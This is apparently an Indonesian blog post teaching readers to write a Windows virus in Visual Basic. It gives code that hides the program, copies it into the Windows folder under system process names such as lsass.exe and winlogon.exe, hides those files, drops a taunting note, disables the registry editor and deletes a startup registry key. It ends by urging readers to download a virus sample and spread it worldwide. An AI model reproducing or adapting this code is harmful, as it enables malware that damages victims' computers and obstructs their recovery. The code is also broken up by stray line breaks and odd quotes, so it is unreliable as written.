langsung prakteknya.
Pertama, bikin form buat virus kamu pake
Standart exe saja 1. Nyembuin Form
Private Sub Form_Load()
App.TaskVisible = False
End Sub
2. Kopiin Diri Sendiri
Misalnya mau dikopiin ke direktori C: \Windows dengan nama winlogon.exe
csrss.exe ato services.exe
biar prosesnya sulit di kill pake
taskmanager, nama virus pake nama
system pada windows
On Error Resume Next FileCopy App.EXEName + “.exe”, “C:
\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:
\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:
\WINDOWS\services.exe” FileCopy App.EXEName + “.exe”, “C:
\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:
\WINDOWS\lsass.exe”
3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori On Error Resume Next
MkDir “C:\WINDOWS\virus”
4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder
Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden
Set sembunyi = CreateObject (”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS
\winlogon.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS
\csrss.exe”).Attributes = 2 sembunyi.GetFile(”C:\WINDOWS
\services.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS
\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS
\lsass.exe”).Attributes = 2 tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”)
.Attributes = 2
5. Bikin Pesan Virus
Bikin pesen pake text file
On Error Resume Next Set bikinpesen = CreateObject
(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:
\baca saya.txt “)
isipesen.writeline (”komputer kamu kena
virus bodoh “) isipesen.Close
6.Ngubah Registry
Misalnya mo disable regedit
On Error Resume Next
Set ubahreg = CreateObject
(”WScript.Shell”) ubahreg.regwrite “HKEY_CURRENT_USER
\software\
microsoft\windows\currentversion
\policies\system\
disableregistrytools”, 1, “REG_DWORD”
7.Menghapus Registry Misalna mo ngehapus HKEY_LOCAL_MACHINE
\
Software\Microsoft\Windows NT
\CurrentVersion\Run\ServLogon
On Error Resume Next
Set hapusreg = CreateObject (”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE
\
Software\Microsoft\Windows NT
\CurrentVersion\Run\ServLogon”
Nah sekian dulu materi yang kita pelajari, dari pada pusing, download sample virus
r3d_94l4xy dan sebarin ke seluruh penjuru
dunia OK!
Tidak ada komentar:
Posting Komentar